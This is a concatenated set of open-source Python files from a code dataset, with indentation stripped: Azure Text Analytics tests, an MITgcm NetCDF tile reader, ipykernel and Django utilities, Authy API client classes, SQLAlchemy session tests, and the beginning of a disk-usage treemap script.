@TextAnalyticsClientPreparer(client_kwargs={"api_version": TextAnalyticsApiVersion.V3_0})
@recorded_by_proxy_async
async def test_string_index_type_not_fail_v3(self, client):
# make sure that the addition of the string_index_type kwarg for v3.1-preview doesn't
# cause v3.0 calls to fail
await client.recognize_linked_entities(["please don't fail"])
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_bing_id(self, client):
result = await client.recognize_linked_entities(["Microsoft was founded by Bill Gates and Paul Allen"])
for doc in result:
for entity in doc.entities:
assert entity.bing_entity_search_api_id # this checks if it's None and if it's empty
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer(client_kwargs={"api_version": TextAnalyticsApiVersion.V3_0})
@recorded_by_proxy_async
async def test_string_index_type_explicit_fails_v3(self, client):
with pytest.raises(ValueError) as excinfo:
await client.recognize_linked_entities(["this should fail"], string_index_type="UnicodeCodePoint")
assert "'string_index_type' is only available for API version V3_1 and up" in str(excinfo.value)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_default_string_index_type_is_UnicodeCodePoint(self, client):
def callback(response):
assert response.http_request.query["stringIndexType"] == "UnicodeCodePoint"
res = await client.recognize_linked_entities(
documents=["Hello world"],
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_explicit_set_string_index_type(self, client):
def callback(response):
assert response.http_request.query["stringIndexType"] == "TextElements_v8"
res = await client.recognize_linked_entities(
documents=["Hello world"],
string_index_type="TextElements_v8",
raw_response_hook=callback
)
@TextAnalyticsPreparer()
@TextAnalyticsClientPreparer()
@recorded_by_proxy_async
async def test_disable_service_logs(self, client):
def callback(resp):
assert resp.http_request.query['loggingOptOut']
await client.recognize_linked_entities(
documents=["Test for logging disable"],
disable_service_logs=True,
raw_response_hook=callback,
)
| Azure/azure-sdk-for-python | sdk/textanalytics/azure-ai-textanalytics/tests/test_recognize_linked_entities_async.py | Python | mit | 28,006 |
import sys
import glob
import numpy as np
from .netcdf import netcdf_file
_exclude_global = ['close',
'createDimension',
'createVariable',
'dimensions',
'filename',
'flush',
'fp',
'mode',
'sync',
'use_mmap',
'variables',
'version_byte',
]
_exclude_var = ['assignValue',
'data',
'dimensions',
'getValue',
'isrec',
'itemsize',
'shape',
'typecode',
]
def getattributes(nc, exclude=[]):
# in order not to rely on implementation, provide fallback
try:
a = dict(nc._attributes)
except AttributeError:
a = dict((k, getattr(nc, k)) for k in dir(nc) if k[0] != '_' and k not in exclude)
return a
class MNC:
"""
A file object for MNC (tiled NetCDF) data.
Should behave mostly like scipy.io.netcdf.netcdf_file in 'r' mode.
Parameters
----------
fpatt :: glob pattern for tile files
layout :: which global layout to use:
'model' : use layout implied by Nx, Ny
'exch2' : use exch2 global layout
'faces' : variables are lists of exch2 faces
default is to use exch2 layout if present, model otherwise
Example:
nc = mnc_files('mnc_*/state.0000000000.t*.nc')
temp = nc.variables['Temp'][:]
salt = nv.variables['S'][:]
nc.close()
temp and salt are now assembled (global) arrays of shape (Nt, Nr, Ny, Nx)
where Nt is the number iterations found in the file (in this case probably 1).
"""
# avoid problems with __del__
nc = []
def __init__(self, fpatt, layout=None, multitime=False):
fnames = glob.glob(fpatt)
# if multitime:
# iters = [ f[-18:-8] for f in fnames if f.endswith('.t001.nc') ]
# iters.sort()
# fnames_first = [ f for f in fnames if f[-18:-8] == iters[0] ]
# else:
# fnames_first = fnames
fnames.sort()
# open files
self.nc = [ netcdf_file(f,'r') for f in fnames ]
# global attributes
# get from first file, but remove/reset tile-specific ones
self._attributes = getattributes(self.nc[0], _exclude_global)
self._attributes['tile_number'] = 1
self._attributes['bi'] = 1
self._attributes['bj'] = 1
haveexch2 = False
for k in list(self._attributes):
if k.startswith('exch2_'):
del self._attributes[k]
haveexch2 = True
sNx = self.sNx
sNy = self.sNy
ntx = self.nSx*self.nPx
nty = self.nSy*self.nPy
if layout is None:
if haveexch2:
layout = 'exch2'
else:
layout = 'model'
self.layout = layout
# precompute indices
self._i0 = []
self._ie = []
self._j0 = []
self._je = []
self._fn = []
self._nf = 0
if layout == 'model':
self._nx = self.Nx
self._ny = self.Ny
for nc in self.nc:
tn = nc.tile_number
bj,bi = divmod(tn-1, ntx)
ie = sNx*(bi+1-ntx)
je = sNy*(bj+1-nty)
self._i0.append(sNx*bi)
self._j0.append(sNy*bj)
self._ie.append(ie or None)
self._je.append(je or None)
elif layout == 'exch2':
self._nx = 0
self._ny = 0
for nc in self.nc:
i0 = nc.exch2_txGlobalo - 1
j0 = nc.exch2_tyGlobalo - 1
ie = i0 + sNx
je = j0 + sNy
self._i0.append(i0)
self._j0.append(j0)
self._ie.append(ie)
self._je.append(je)
self._nx = max(self._nx, ie)
self._ny = max(self._ny, je)
# make ie, je relative to end (for non-tracer points)
for i in range(len(self._i0)):
ie = self._ie[i] - self._nx
je = self._je[i] - self._ny
self._ie[i] = ie or None
self._je[i] = je or None
elif layout == 'faces':
self._nx = {}
self._ny = {}
for nc in self.nc:
fn = nc.exch2_myFace
i0 = nc.exch2_tBasex
j0 = nc.exch2_tBasey
ie = i0 + sNx
je = j0 + sNy
self._fn.append(fn)
self._i0.append(i0)
self._j0.append(j0)
self._ie.append(ie)
self._je.append(je)
self._nx[fn] = max(self._nx.get(fn, 0), ie)
self._ny[fn] = max(self._ny.get(fn, 0), je)
# make ie, je relative to end (for non-tracer points)
for i in range(len(self._fn)):
fn = self._fn[i]
ie = self._ie[i] - self._nx[fn]
je = self._je[i] - self._ny[fn]
self._ie[i] = ie or None
self._je[i] = je or None
self._fns = sorted(self._nx.keys())
self._nf = len(self._fns)
for i in range(len(self._fn)):
self._fn[i] = self._fns.index(self._fn[i])
self._nx = np.array([self._nx[fn] for fn in self._fns])
self._ny = np.array([self._ny[fn] for fn in self._fns])
else:
raise ValueError('Unknown layout: {}'.format(layout))
# dimensions
self.dimensions = {}
for k,n in self.nc[0].dimensions.items():
# compute size of dimension in global array for X* and Y*
if k[0] == 'X':
n += self._nx - sNx
if k[0] == 'Y':
n += self._ny - sNy
self.dimensions[k] = n
# variables
var0 = self.nc[0].variables
# find size of record dimension first
if 'T' in self.dimensions and self.dimensions['T'] is None:
self.times = list(var0.get('T', [])[:])
self.iters = list(var0.get('iter', self.times)[:])
self.nrec = len(self.iters)
self.variables = dict((k, MNCVariable(self, k)) for k in var0)
def __getattr__(self, k):
try:
return self._attributes[k]
except KeyError:
raise AttributeError("'MNC' object has no attribute '" + k + "'")
def __dir__(self):
return self.__dict__.keys() + self._attributes.keys()
def close(self):
"""Close tile files"""
for nc in self.nc:
nc.close()
__del__ = close
@property
def faces(self):
if self.layout == 'faces':
return self._fns
else:
return None
def calcstrides(slices, dims):
try:
slices[0]
except TypeError:
slices = (slices,)
if Ellipsis in slices:
cut = slices.index(Ellipsis)
slices = slices[:cut] + (len(dims)-len(slices)+1)*(slice(0,None,None),) + slices[cut+1:]
else:
slices = slices + (len(dims)-len(slices))*(slice(0,None,None),)
# return tuple( hasattr(s,'indices') and s.indices(dim) or s for s,dim in zip(slices,dims) )
strides = []
shape = []
fullshape = []
for s,dim in zip(slices,dims):
try:
stride = s.indices(dim)
except AttributeError:
stride = (s, s+1, 1)
n = 1
else:
# real slice, will make a dimension
start,stop,step = stride
n = (stop-start+step-1)//step
shape.append(n)
fullshape.append(n)
strides.append(stride)
return tuple(strides), tuple(shape), tuple(fullshape)
class MNCVariable(object):
def __init__(self, mnc, name):
self._name = name
self.nc = mnc.nc
self.layout = mnc.layout
self._i0 = mnc._i0
self._ie = mnc._ie
self._j0 = mnc._j0
self._je = mnc._je
self._nf = mnc._nf
self._fn = mnc._fn
v0 = mnc.nc[0].variables[name]
self._attributes = getattributes(v0, _exclude_var)
self.itemsize = v0.data.itemsize
self.typecode = v0.typecode
self.dtype = np.dtype(self.typecode())
self.dimensions = v0.dimensions
self.shape = tuple( mnc.dimensions[d] for d in self.dimensions )
self.isrec = self.shape[0] is None
if self.isrec:
self.shape = (mnc.nrec,) + self.shape[1:]
# which dimensions are tiled
self._Xdim = None
self._Ydim = None
for i,d in enumerate(self.dimensions):
if d[0] == 'X': self._Xdim = i
if d[0] == 'Y': self._Ydim = i
def __getattr__(self, k):
try:
return self._attributes[k]
except KeyError:
raise AttributeError("'MNCVariable' object has no attribute '" + k + "'")
def __dir__(self):
return self.__dict__.keys() + self._attributes.keys()
def __getitem__(self, ind):
if self.layout == 'faces':
return self._getfaces(ind)
if ind in [Ellipsis, slice(None)]:
# whole array
res = np.zeros(self.shape, self.typecode())
s = [slice(None) for d in self.shape]
for i,nc in enumerate(self.nc):
if self._Xdim is not None:
s[self._Xdim] = slice(self._i0[i], self._ie[i])
if self._Ydim is not None:
s[self._Ydim] = slice(self._j0[i], self._je[i])
res[s] = nc.variables[self._name][:]
return res
else:
# read only required data
strides,resshape,fullshape = calcstrides(ind, self.shape)
res = np.zeros(fullshape, self.dtype)
s = [slice(*stride) for stride in strides]
sres = [slice(None) for d in fullshape]
if self._Xdim is not None: I0,Ie,Is = strides[self._Xdim]
if self._Ydim is not None: J0,Je,Js = strides[self._Ydim]
for i,nc in enumerate(self.nc):
if self._Xdim is not None:
i0 = self._i0[i]
ie = self.shape[self._Xdim] + (self._ie[i] or 0)
a,b = divmod(I0 - i0, Is)
e = np.clip(ie, I0, Ie)
sres[self._Xdim] = slice(max(-a, 0), (e - I0)//Is)
s[self._Xdim] = slice(max(I0 - i0, b), max(Ie - i0, 0), Is)
if self._Ydim is not None:
j0 = self._j0[i]
je = self.shape[self._Ydim] + (self._je[i] or 0)
a,b = divmod(J0 - j0, Js)
e = np.clip(je, J0, Je)
sres[self._Ydim] = slice(max(-a, 0), (e - J0)//Js)
s[self._Ydim] = slice(max(J0 - j0, b), max(Je - j0, 0), Js)
res[sres] = nc.variables[self._name][s]
return res.reshape(resshape)
def _getfaces(self, ind):
res = []
for f in range(self._nf):
shape = tuple(np.isscalar(d) and d or d[f] for d in self.shape)
a = np.zeros(shape, self.typecode())
res.append(a)
s = [slice(None) for d in self.shape]
for i,nc in enumerate(self.nc):
fn = self._fn[i]
if self._Xdim is not None:
s[self._Xdim] = slice(self._i0[i], self._ie[i])
if self._Ydim is not None:
s[self._Ydim] = slice(self._j0[i], self._je[i])
res[fn][s] = nc.variables[self._name][:]
for f in range(self._nf):
res[f] = res[f][ind]
return res
def face(self, fn):
shape = tuple(np.isscalar(d) and d or d[fn] for d in self.shape)
res = np.zeros(shape, self.typecode())
s = [slice(None) for d in self.shape]
for i,nc in enumerate(self.nc):
if self._fn[i] == fn:
if self._Xdim is not None:
s[self._Xdim] = slice(self._i0[i], self._ie[i])
if self._Ydim is not None:
s[self._Ydim] = slice(self._j0[i], self._je[i])
res[s] = nc.variables[self._name][:]
return res
def mnc_files(fpatt, layout=None):
return MNC(fpatt, layout)
mnc_files.__doc__ = MNC.__doc__
def rdmnc(fpatt, varnames=None, iters=None, slices=Ellipsis, layout=None):
''' Read one or more variables from an mnc file set.
Parameters
----------
fpatt :: glob pattern for netcdf files comprising the set
varnames :: list of variables to read (default all)
iters :: list of iterations (not time) to read
slices :: tuple of slices to read from each variable
(typically given as numpy.s_[...])
Returns a dictionary of arrays.
Example:
S = rdmnc("mnc_*/state.0000000000.*', ['U', 'V'], slices=numpy.s_[..., 10:-10, 10:-10])
u = S['U']
v = S['V']
Can currently read only one file set (i.e., 1 file per tile),
not several files split in time.
Consider using mnc_files for more control (and similar convenience).
The same restriction about multiple files applies, however.
'''
mnc = MNC(fpatt, layout)
if varnames is None:
varnames = mnc.variables.keys()
elif isinstance(varnames, str):
varnames = [varnames]
if iters is not None:
try:
iters[0]
except TypeError:
iters = [iters]
iits = [ mnc.iters.index(it) for it in iters ]
if not isinstance(slices, tuple):
slices = (slices,)
res = {}
for varname in varnames:
var = mnc.variables[varname]
if iters is not None and var.dimensions[0] == 'T':
res[varname] = np.array([var[(iit,)+slices] for iit in iits])
else:
res[varname] = var[slices]
mnc.close()
return res
| altMITgcm/MITgcm66h | utils/python/MITgcmutils/MITgcmutils/mnc.py | Python | mit | 14,112 |
"""Publishing native (typically pickled) objects.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from traitlets.config import Configurable
from ipykernel.inprocess.socket import SocketABC
from traitlets import Instance, Dict, CBytes
from ipykernel.jsonutil import json_clean
from ipykernel.serialize import serialize_object
from jupyter_client.session import Session, extract_header
class ZMQDataPublisher(Configurable):
topic = topic = CBytes(b'datapub')
session = Instance(Session, allow_none=True)
pub_socket = Instance(SocketABC, allow_none=True)
parent_header = Dict({})
def set_parent(self, parent):
"""Set the parent for outbound messages."""
self.parent_header = extract_header(parent)
def publish_data(self, data):
"""publish a data_message on the IOPub channel
Parameters
----------
data : dict
The data to be published. Think of it as a namespace.
"""
session = self.session
buffers = serialize_object(data,
buffer_threshold=session.buffer_threshold,
item_threshold=session.item_threshold,
)
content = json_clean(dict(keys=list(data.keys())))
session.send(self.pub_socket, 'data_message', content=content,
parent=self.parent_header,
buffers=buffers,
ident=self.topic,
)
def publish_data(data):
"""publish a data_message on the IOPub channel
Parameters
----------
data : dict
The data to be published. Think of it as a namespace.
"""
from ipykernel.zmqshell import ZMQInteractiveShell
ZMQInteractiveShell.instance().data_pub.publish_data(data)
| bdh1011/wau | venv/lib/python2.7/site-packages/ipykernel/datapub.py | Python | mit | 1,761 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-03-03 01:08
from __future__ import unicode_literals
from django.db import migrations, models
from blog.models import Post
def slugify_all_posts(*args):
for post in Post.objects.all():
post.save()
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(default='', max_length=100),
),
migrations.RunPython(slugify_all_posts)
]
| nnscr/nnscr.de | blog/migrations/0002_post_slug.py | Python | mit | 608 |
import six
from unittest import TestCase
from dark.reads import Read, Reads
from dark.score import HigherIsBetterScore
from dark.hsp import HSP, LSP
from dark.alignments import (
Alignment, bestAlignment, ReadAlignments, ReadsAlignmentsParams,
ReadsAlignments)
class TestAlignment(TestCase):
"""
Tests for the dark.alignment.Alignment class
"""
def testExpectedAttrs(self):
"""
An alignment must have the expected attributes.
"""
alignment = Alignment(45, 'title')
self.assertEqual('title', alignment.subjectTitle)
self.assertEqual(45, alignment.subjectLength)
def testNoHspsWhenCreated(self):
"""
An alignment must have no HSPs when it is created.
"""
alignment = Alignment(45, 'title')
self.assertEqual(0, len(alignment.hsps))
def testAddHsp(self):
"""
It must be possible to add an HSP to an alignment.
"""
alignment = Alignment(45, 'title')
alignment.addHsp(HSP(3))
self.assertEqual(HSP(3), alignment.hsps[0])
class TestReadAlignments(TestCase):
"""
Tests for the dark.alignment.ReadAlignments class
"""
def testRead(self):
"""
An read alignments must store its read.
"""
read = Read('id', 'ACGT')
readAlignments = ReadAlignments(read)
self.assertEqual(read, readAlignments.read)
def testNoAlignments(self):
"""
An read alignments must be able to have no alignments.
"""
read = Read('id', 'ACGT')
readAlignments = ReadAlignments(read)
self.assertEqual(0, len(readAlignments))
def testAlignments(self):
"""
An read alignments must store its alignments.
"""
read = Read('id', 'ACGT')
alignment1 = Alignment(45, 'title1')
alignment2 = Alignment(55, 'title2')
readAlignments = ReadAlignments(read, [alignment1, alignment2])
self.assertEqual([alignment1, alignment2], readAlignments)
class TestBestAlignmentHSP(TestCase):
"""
Test the L{dark.hits.bestAlignment} function when HSPs are used.
"""
def testOneAlignment(self):
"""
When one alignment is present that alignment must be returned by
bestAlignment.
"""
alignment = Alignment(44, 'Seq 1')
alignment.addHsp(HSP(10))
alignment.addHsp(HSP(9))
alignments = [alignment]
hit = ReadAlignments(Read('id1', 'aaa'), alignments)
best = bestAlignment(hit)
self.assertEqual('Seq 1', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
def testThreeAlignments(self):
"""
When three alignments are present, the one with the highest first HSP
must be returned by bestAlignment.
"""
alignment1 = Alignment(33, 'Seq 1')
alignment1.addHsp(HSP(10))
alignment1.addHsp(HSP(9))
alignment2 = Alignment(44, 'Seq 2')
alignment2.addHsp(HSP(30))
alignment2.addHsp(HSP(29))
alignment3 = Alignment(55, 'Seq 3')
alignment3.addHsp(HSP(20))
alignment3.addHsp(HSP(19))
alignments = [alignment1, alignment2, alignment3]
hit = ReadAlignments(Read('id1', 'aaa'), alignments)
best = bestAlignment(hit)
self.assertEqual('Seq 2', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
class TestBestAlignmentLSP(TestCase):
"""
Test the L{dark.hits.bestAlignment} function when LSPs are used.
"""
def testOneAlignment(self):
"""
When one alignment is present that alignment must be returned by
bestAlignment.
"""
alignment = Alignment(44, 'Seq 1')
alignment.addHsp(LSP(10))
alignment.addHsp(LSP(9))
alignments = [alignment]
readAlignments = ReadAlignments(Read('id0', 'aaa'), alignments)
best = bestAlignment(readAlignments)
self.assertEqual('Seq 1', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
def testThreeAlignments(self):
"""
When three alignments are present, the one with the lowest first HSP
must be returned by bestAlignment.
"""
alignment1 = Alignment(33, 'Seq 1')
alignment1.addHsp(LSP(10))
alignment1.addHsp(LSP(9))
alignment2 = Alignment(44, 'Seq 2')
alignment2.addHsp(LSP(3))
alignment2.addHsp(LSP(2))
alignment3 = Alignment(55, 'Seq 3')
alignment3.addHsp(LSP(20))
alignment3.addHsp(LSP(19))
alignments = [alignment1, alignment2, alignment3]
readAlignments = ReadAlignments(Read('id0', 'aaa'), alignments)
best = bestAlignment(readAlignments)
self.assertEqual('Seq 2', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
class TestReadsAlignmentsParams(TestCase):
"""
Test the L{dark.alignments.ReadsAlignmentsParams} class.
"""
def testExpectedAttrs(self):
"""
A ReadsAlignmentsParams instance must have the expected attributes.
"""
applicationParams = {}
params = ReadsAlignmentsParams('application name', applicationParams,
False, 'Bit score')
self.assertEqual('application name', params.application)
self.assertIs(applicationParams, params.applicationParams)
self.assertFalse(params.subjectIsNucleotides)
self.assertEqual('Bit score', params.scoreTitle)
class TestReadsAlignments(TestCase):
"""
Test the L{dark.alignments.ReadsAlignments} class.
"""
# NOTE: The ReadsAlignments class is a base class for concrete
# implementations, such as BlastReadsAlignments. So it can only be
# tested minimally by itself. For full tests see the
# TestBlastReadsAlignments and TestBlastReadsAlignmentsFiltering
# classes in test/blast/blast_alignments.py
def testExpectedAttrs(self):
"""
A ReadsAlignments instance must have the expected attributes.
"""
reads = Reads()
params = {
'application': 'app name'
}
readsAlignments = ReadsAlignments(reads, params)
self.assertIs(readsAlignments.reads, reads)
self.assertEqual('app name', readsAlignments.params['application'])
self.assertIs(params, readsAlignments.params)
self.assertIs(HigherIsBetterScore, readsAlignments.scoreClass)
def testNotIterable(self):
"""
Iterating an empty ReadsAlignments must result in the empty list.
"""
reads = Reads()
readsAlignments = ReadsAlignments(reads, 'applicationName', None)
self.assertEqual([], list(readsAlignments))
def testGetSubjectSequence(self):
"""
A ReadsAlignments instance will not implement getSubjectSequence.
Subclasses are expected to implement it.
"""
reads = Reads()
readsAlignments = ReadsAlignments(reads, 'applicationName', None)
error = 'getSubjectSequence must be implemented by a subclass'
six.assertRaisesRegex(self, NotImplementedError, error,
readsAlignments.getSubjectSequence, 'title')
| bamueh/dark-matter | test/test_alignments.py | Python | mit | 7,278 |
import requests
import platform
from authy import __version__, AuthyFormatException
from urllib.parse import quote
# import json
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
from django.utils import simplejson as json
class Resource(object):
def __init__(self, api_uri, api_key):
self.api_uri = api_uri
self.api_key = api_key
self.def_headers = self.__default_headers()
def post(self, path, data=None):
return self.request("POST", path, data, {'Content-Type': 'application/json'})
def get(self, path, data=None):
return self.request("GET", path, data)
def put(self, path, data=None):
return self.request("PUT", path, data, {'Content-Type': 'application/json'})
def delete(self, path, data=None):
return self.request("DELETE", path, data)
def request(self, method, path, data=None, req_headers=None):
if data is None:
data = {}
if req_headers is None:
req_headers = {}
url = self.api_uri + path
params = {"api_key": self.api_key}
headers = self.def_headers
headers.update(req_headers)
if method == "GET":
params.update(data)
return requests.request(method, url, headers=headers,
params=params)
else:
return requests.request(method, url, headers=headers,
params=params, data=json.dumps(data))
def __default_headers(self):
return {
'User-Agent': "AuthyPython/{0} ({1}; Python {2})".format(
__version__,
platform.platform(True),
platform.python_version()
)}
class Instance(object):
def __init__(self, resource, response):
self.resource = resource
self.response = response
try:
self.content = self.response.json()
except ValueError:
self.content = self.response.text
def ok(self):
return self.response.status_code == 200
def errors(self):
if self.ok():
return {}
errors = self.content
if(not isinstance(errors, dict)):
errors = {"error": errors}
elif('errors' in errors):
errors = errors['errors']
return errors
def __getitem__(self, key):
return self.content[key]
class Sms(Instance):
def ignored(self):
try:
self.content['ignored']
return True
except KeyError:
return False
class User(Instance):
def __init__(self, resource, response):
super(User, self).__init__(resource, response)
if(isinstance(self.content, dict) and 'user' in self.content):
self.id = self.content['user']['id']
else:
self.id = None
class Users(Resource):
def create(self, email, phone, country_code=1):
data = {
"user": {
"email": email,
"cellphone": phone,
"country_code": country_code
}
}
resp = self.post("/protected/json/users/new", data)
return User(self, resp)
def request_sms(self, user_id, options={}):
resp = self.get("/protected/json/sms/"+quote(str(user_id)), options)
return Sms(self, resp)
def status(self, user_id):
resp = self.get("/protected/json/users/{0}/status".format(user_id))
return User(self, resp)
def delete(self, user_id):
resp = self.post("/protected/json/users/{0}/delete".format(user_id))
return User(self, resp)
class Token(Instance):
def ok(self):
if super(Token, self).ok():
return '"token":"is valid"' in str(self.response.content)
return False
class Tokens(Resource):
def verify(self, device_id, token, options={}):
self.__validate(token, device_id)
if 'force' not in options:
options['force'] = "true"
url = "/protected/json/verify/"
url += quote(str(token))+"/"+quote(str(device_id))
resp = self.get(url, options)
return Token(self, resp)
def __validate(self, token, device_id):
self.__validate_digit(token, "Invalid Token. Only digits accepted.")
self.__validate_digit(device_id,
"Invalid Authy id. Only digits accepted.")
length = len(str(token))
if length < 6 or length > 10:
raise AuthyFormatException("Invalid Token. Unexpected length.")
def __validate_digit(self, var, message):
# PEP 0237: Essentially, long renamed to int.
if not isinstance(var, int) and not var.isdigit():
raise AuthyFormatException(message)
class App(Instance):
pass
class Apps(Resource):
def fetch(self):
resp = self.get("/protected/json/app/details")
return App(self, resp)
class Stats(Instance):
pass
class StatsResource(Resource):
def fetch(self):
resp = self.get("/protected/json/app/stats")
return Stats(self, resp)
class Phone(Instance):
pass
class Phones(Resource):
def verification_start(self, phone_number, country_code, via = 'sms'):
options = {
'phone_number': phone_number,
'country_code': country_code,
'via': via
}
resp = self.post("/protected/json/phones/verification/start", options)
return Phone(self, resp)
def verification_check(self, phone_number, country_code, verification_code):
options = {
'phone_number': phone_number,
'country_code': country_code,
'verification_code': verification_code
}
resp = self.get("/protected/json/phones/verification/check", options)
return Phone(self, resp)
def info(self, phone_number, country_code):
options = {
'phone_number': phone_number,
'country_code': country_code
}
resp = self.get("/protected/json/phones/info", options)
return Phone(self, resp)
| smontoya/authy-python3 | authy/api/resources.py | Python | mit | 6,164 |
import datetime
import MySQLdb
from os import sys
class DBLogger:
def __init__(self, loc='default-location'):
self.usr = '<user>'
self.pwd = '<password>'
self.dbase = '<database>'
self.location = loc
self.conn = MySQLdb.connect(host="localhost", user=self.usr, passwd=self.pwd, db=self.dbase)
self.cursor = self.conn.cursor()
def cleanUp(self):
self.conn.close()
self.cursor.close()
| georgetown-analytics/classroom-occupancy | SensorDataCollection/Sensors/DBLogger.py | Python | mit | 421 |
from unittest.mock import Mock
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy.orm import query
from sqlalchemy.orm import relationship
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import assert_warns_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import mock
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
class ScopedSessionTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("someid", None, ForeignKey("table1.id")),
)
def test_basic(self):
table2, table1 = self.tables.table2, self.tables.table1
Session = scoped_session(sa.orm.sessionmaker(testing.db))
class CustomQuery(query.Query):
pass
class SomeObject(fixtures.ComparableEntity):
query = Session.query_property()
class SomeOtherObject(fixtures.ComparableEntity):
query = Session.query_property()
custom_query = Session.query_property(query_cls=CustomQuery)
self.mapper_registry.map_imperatively(
SomeObject,
table1,
properties={"options": relationship(SomeOtherObject)},
)
self.mapper_registry.map_imperatively(SomeOtherObject, table2)
s = SomeObject(id=1, data="hello")
sso = SomeOtherObject()
s.options.append(sso)
Session.add(s)
Session.commit()
Session.refresh(sso)
Session.remove()
eq_(
SomeObject(
id=1, data="hello", options=[SomeOtherObject(someid=1)]
),
Session.query(SomeObject).one(),
)
eq_(
SomeObject(
id=1, data="hello", options=[SomeOtherObject(someid=1)]
),
SomeObject.query.one(),
)
eq_(
SomeOtherObject(someid=1),
SomeOtherObject.query.filter(
SomeOtherObject.someid == sso.someid
).one(),
)
assert isinstance(SomeOtherObject.query, query.Query)
assert not isinstance(SomeOtherObject.query, CustomQuery)
assert isinstance(SomeOtherObject.custom_query, query.Query)
def test_config_errors(self):
Session = scoped_session(sa.orm.sessionmaker())
s = Session() # noqa
assert_raises_message(
sa.exc.InvalidRequestError,
"Scoped session is already present",
Session,
bind=testing.db,
)
assert_warns_message(
sa.exc.SAWarning,
"At least one scoped session is already present. ",
Session.configure,
bind=testing.db,
)
def test_call_with_kwargs(self):
mock_scope_func = Mock()
SessionMaker = sa.orm.sessionmaker()
Session = scoped_session(sa.orm.sessionmaker(), mock_scope_func)
s0 = SessionMaker()
assert s0.autoflush == True
mock_scope_func.return_value = 0
s1 = Session()
assert s1.autoflush == True
assert_raises_message(
sa.exc.InvalidRequestError,
"Scoped session is already present",
Session,
autoflush=False,
)
mock_scope_func.return_value = 1
s2 = Session(autoflush=False)
assert s2.autoflush == False
def test_methods_etc(self):
mock_session = Mock()
mock_session.bind = "the bind"
sess = scoped_session(lambda: mock_session)
sess.add("add")
sess.delete("delete")
sess.get("Cls", 5)
eq_(sess.bind, "the bind")
eq_(
mock_session.mock_calls,
[
mock.call.add("add", _warn=True),
mock.call.delete("delete"),
mock.call.get(
"Cls",
5,
options=None,
populate_existing=False,
with_for_update=None,
identity_token=None,
execution_options=None,
),
],
)
with mock.patch(
"sqlalchemy.orm.session.object_session"
) as mock_object_session:
sess.object_session("foo")
eq_(mock_object_session.mock_calls, [mock.call("foo")])
@testing.combinations(
"style1",
"style2",
"style3",
"style4",
)
def test_get_bind_custom_session_subclass(self, style):
"""test #6285"""
class MySession(Session):
if style == "style1":
def get_bind(self, mapper=None, **kwargs):
return super().get_bind(mapper=mapper, **kwargs)
elif style == "style2":
# this was the workaround for #6285, ensure it continues
# working as well
def get_bind(self, mapper=None, *args, **kwargs):
return super().get_bind(mapper, *args, **kwargs)
elif style == "style3":
# py2k style
def get_bind(self, mapper=None, *args, **kwargs):
return super(MySession, self).get_bind(
mapper, *args, **kwargs
)
elif style == "style4":
# py2k style
def get_bind(self, mapper=None, **kwargs):
return super(MySession, self).get_bind(
mapper=mapper, **kwargs
)
s1 = MySession(testing.db)
is_(s1.get_bind(), testing.db)
ss = scoped_session(sessionmaker(testing.db, class_=MySession))
is_(ss.get_bind(), testing.db)
def test_attributes(self):
expected = [
name
for cls in Session.mro()
for name in vars(cls)
if not name.startswith("_")
]
ignore_list = {
"connection_callable",
"transaction",
"in_transaction",
"in_nested_transaction",
"get_transaction",
"get_nested_transaction",
"prepare",
"invalidate",
"bind_mapper",
"bind_table",
"enable_relationship_loading",
"dispatch",
}
SM = scoped_session(sa.orm.sessionmaker(testing.db))
missing = [
name
for name in expected
if not hasattr(SM, name) and name not in ignore_list
]
eq_(missing, [])
| sqlalchemy/sqlalchemy | test/orm/test_scoping.py | Python | mit | 7,276 |
#!/usr/bin/env python
'''
Creates an html treemap of disk usage, using the Google Charts API
'''
import json
import os
import subprocess
import sys
def memoize(fn):
stored_results = {}
def memoized(*args):
try:
return stored_results[args]
except KeyError:
result = stored_results[args] = fn(*args)
return result
return memoized
@memoize
def get_folder_size(folder):
total_size = os.path.getsize(folder)
for item in os.listdir(folder):
itempath = os.path.join(folder, item)
if os.path.isfile(itempath):
total_size += os.path.getsize(itempath)
elif os.path.isdir(itempath):
total_size += get_folder_size(itempath)
return total_size
def usage_iter(root):
root = os.path.abspath(root)
root_size = get_folder_size(root)
root_string = "{0}\n{1}".format(root, root_size)
yield [root_string, None, root_size]
for parent, dirs, files in os.walk(root):
for dirname in dirs:
fullpath = os.path.join(parent, dirname)
try:
this_size = get_folder_size(fullpath)
parent_size = get_folder_size(parent)
this_string = "{0}\n{1}".format(fullpath, this_size)
parent_string = "{0}\n{1}".format(parent, parent_size)
yield [this_string, parent_string, this_size]
except OSError:
continue
def json_usage(root):
root = os.path.abspath(root)
result = [['Path', 'Parent', 'Usage']]
result.extend(entry for entry in usage_iter(root))
return json.dumps(result)
def main(args):
'''Populates an html template using JSON-formatted output from the
Linux 'du' utility and prints the result'''
html = '''
<html>
<head>
<script type="text/javascript" src="https://www.google.com/jsapi"></script>
<script type="text/javascript">
